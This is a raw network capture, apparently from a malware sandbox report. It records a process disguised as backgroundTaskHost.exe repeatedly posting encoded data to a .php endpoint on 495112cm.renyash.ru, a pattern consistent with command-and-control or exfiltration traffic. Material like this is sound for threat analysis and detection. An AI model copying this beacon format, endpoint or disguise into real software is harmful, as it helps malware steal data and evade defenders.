                                                                                          CF-RAY: 8fca6e1eba447287-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3560&min_rtt=1960&rtt_var=3936&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=98869&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0
                                                                                          Jan 4, 2025 11:08:57.109790087 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.300827026 CET | 833 | IN | HTTP/1.1 100 Continue


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          95 | 192.168.2.4 | 50103 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:57.301697969 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:57.654903889 CET | 2520 | OUT | Data Raw: 51 5c 5e 5f 50 5c 5f 51 5c 5b 52 58 57 5b 58 5a 58 54 5a 5f 52 50 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^_P\_Q\[RXW[XZXTZ_RPQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B*(7%#Y)!=\'X44)/'Y(&3#%)!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:57.777987957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.960460901 CET | 815 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLM%2FKQ88RYjPhM%2F3yUYC8zinSX9YONGFLdeOMaDBKumyZT%2B6PDi8%2FihwsXQOLurplXgd0Llcw%2BayeLMC%2BdE3UJRUS3jmrdltSM%2B4RQmSVncq49cM2%2BIbyNHffjNpdEUFOu4nZjT7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e28cb3b4282-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3216&min_rtt=1743&rtt_var=3600&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=107908&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          96 | 192.168.2.4 | 50104 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:58.030967951 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1820
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:58.389277935 CET | 1820 | OUT | Data Raw: 54 58 5b 53 55 5b 5a 57 5c 5b 52 58 57 5e 58 5f 58 55 5a 5c 52 51 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[SU[ZW\[RXW^X_XUZ\RQQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->9?7110;>%\![%['.7 =<<,+'7">;!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:58.498950958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:58.759396076 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRFl5p1yXdPYeHw5f5qa5br5Brba4uB%2F8K54KgcesYaDFvW0GycT7suI9GOeH5fvEwUBMPyDqQ0mBDenqnryqbqiO9dUZJjGtZr7VZhW8liv%2BZMExqGwVNFglDS2CFEhP%2F3U%2BNJu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e2d4caa7c8e-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7740&min_rtt=1911&rtt_var=12376&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2137&delivery_rate=30072&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0f 2b 58 38 55 35 3f 34 12 29 58 31 07 26 20 28 12 2c 22 38 03 34 05 20 06 2c 0b 25 59 30 0d 06 5e 2a 3f 28 57 34 30 27 57 33 0a 2a 5d 06 12 38 12 3f 05 3a 58 25 2b 0b 0d 2a 0b 31 1c 33 35 25 06 24 2e 30 05 3e 3c 0f 5d 25 3f 21 1f 2b 2f 25 07 3a 2a 0e 40 38 3f 37 08 36 13 21 53 08 13 20 55 26 21 20 0e 29 20 14 00 27 20 36 00 33 03 2f 57 2a 28 02 19 27 07 36 5c 2e 22 3c 00 3f 0a 38 1f 3a 10 20 5b 3f 07 24 0d 27 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+X8U5?4)X1& (,"84 ,%Y0^*?(W40'W3*]8?:X%+*135%$.0><]%?!+/%:*@8?76!S U&! ) ' 63/W*('6\."<?8: [?$'"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          97 | 192.168.2.4 | 50105 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:58.340838909 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:58.686181068 CET | 2520 | OUT | Data Raw: 51 5d 5b 50 50 58 5f 50 5c 5b 52 58 57 5d 58 5b 58 57 5a 58 52 57 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q][PPX_P\[RXW]X[XWZXRWQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)@"8!Q1?(,:"=:'S4>!)/ (& -*!Y#!Y,
                                                                                          Jan 4, 2025 11:08:58.784904957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:59.051395893 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LclDkxW2us7qYifwmgqf%2Bx%2FU8dEgJ9iB2%2BRpp2vF4o91gSC4X9UQQ8boRi%2FDjUJPeo26gKara%2FEb9nJfVClKKsb%2F9FV0zmCy%2BXIZxeUE1YFrFHs5LkwvS%2FsuzlXrmiQOa3wNsk%2B2"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e2f1c93420a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3648&min_rtt=1680&rtt_var=4566&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=83782&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          98 | 192.168.2.4 | 50106 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:59.173322916 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:59.533533096 CET | 2512 | OUT | Data Raw: 51 5a 5e 52 55 59 5f 51 5c 5b 52 58 57 5a 58 5a 58 57 5a 5c 52 57 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^RUY_Q\[RXWZXZXWZ\RWQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E)9?"+9&3?^)/9Z5>9]$>##>)?+^<&44=:_=;!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:59.636214972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:59.814384937 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pegVDJIafbWFDgffLmzvpIWheEk4o9yvaxTmkjIGknfkuxkW9eCo7bA2rCeCfo5ELONzZouW2m4HpmX8RbbE0G2%2BCM8dKgpdrICw0E82PBKaViy2cCzcehMKpJiGUdUE2Mxt3Uwx"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e346ec8425b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3109&min_rtt=1615&rtt_var=3595&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2805&delivery_rate=107558&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          99 | 192.168.2.4 | 50107 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:59.940064907 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:00.295586109 CET | 2520 | OUT | Data Raw: 54 5c 5b 54 50 5f 5a 50 5c 5b 52 58 57 58 58 59 58 5d 5a 58 52 51 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\[TP_ZP\[RXWXXYX]ZXRQQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=)'#(%?*<Y6=:'.$49)/<+;"=^=!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:00.408482075 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:00.585217953 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zewC2oW4EDb42nUT2%2FIuDUofampEKEB8x7cJTiBOhzu5qtNbvuAv5EYnWbZy2hZuhvWF0uDGi72yf%2B5weMH9Fy6IiGAYF6gwAPGajSjtnjW9FFlXISbQMVQCfNb4XExIOIlLsnIa"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e393e557d1a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4715&min_rtt=1989&rtt_var=6198&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=61352&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          100 | 192.168.2.4 | 50108 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:00.705059052 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:01.061202049 CET | 2520 | OUT | Data Raw: 54 5f 5b 50 50 59 5f 51 5c 5b 52 58 57 5f 58 5e 58 51 5a 5c 52 51 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[PPY_Q\[RXW_X^XQZ\RQQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)*7"(:%?*<]!-*0=+W4.-+,0(@'4>>Z*!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:01.150696039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:01.411451101 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thVK2uhXzIkvU%2B3K9scgX6h59BnG77GMkYzfZAR4vQjTbPiZSIi3pRVfT9%2Be%2F2kYpL6LlgmTKfrrpAHvCVhnamhsFwmZVNdE1i%2FLrJVRCKmfXNM%2ForNxafrwuKr%2BU%2B1OEn4dEnIu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e3dec227c6a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2365&min_rtt=1860&rtt_var=1708&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=247289&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          101 | 192.168.2.4 | 50109 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:01.532911062 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:01.889364004 CET | 2520 | OUT | Data Raw: 54 50 5e 57 55 58 5f 54 5c 5b 52 58 57 5b 58 58 58 51 5a 5d 52 55 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^WUX_T\[RXW[XXXQZ]RUQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E=9#E (&/)Z96507 ></#(3[4=!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:01.997416973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:02.256860971 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5xCW5EEvnxK%2FO3X2mpPZaWi%2BKNnVpFYmJovxDDS%2FxAeamOtQIS1VL6H1dBzbi%2FrL9nzLCrk4Z8g%2F44DCvR0q3H3OPaT7FY%2FBxL7wcJTADGyRF09PjWSzd6eAdkOxsCe73M4mbn7u"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e432d990fa0-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2895&min_rtt=1619&rtt_var=3160&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=123404&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          102 | 192.168.2.4 | 50110 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:02.407355070 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:02.764400959 CET | 2520 | OUT | Data Raw: 51 5d 5e 5f 55 53 5f 50 5c 5b 52 58 57 59 58 58 58 57 5a 5b 52 50 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^_US_P\[RXWYXXXWZ[RPQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=:3C ;5'0(=,&"%]'-$ ..Q(Z8(5 "="_*!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:02.851553917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:03.069988966 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYb8YiPo9pVvdnEE4oglGM5ff5GpcHzhstGJ8KQE98XDooO3BCesZiKIhyjEfWDegET2zLbwMFDJE7Wb6Ow4IlZDfuEf9caqK9fbcI9DP9oddXHwLBtv4ml1hE6JtCrulxrwoOlk"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e488c0c8c06-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2594&min_rtt=1993&rtt_var=1951&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=214453&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          103 | 192.168.2.4 | 50111 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:03.191826105 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:03.545697927 CET | 2520 | OUT | Data Raw: 54 5f 5b 53 55 5c 5f 56 5c 5b 52 58 57 53 58 5f 58 57 5a 5e 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[SU\_V\[RXWSX_XWZ^R\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C*4;!%/*1X6.%]$=;#:R<< <87>1>!Y#!Y,
                                                                                          Jan 4, 2025 11:09:03.813927889 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          104 | 192.168.2.4 | 50112 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:03.814786911 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
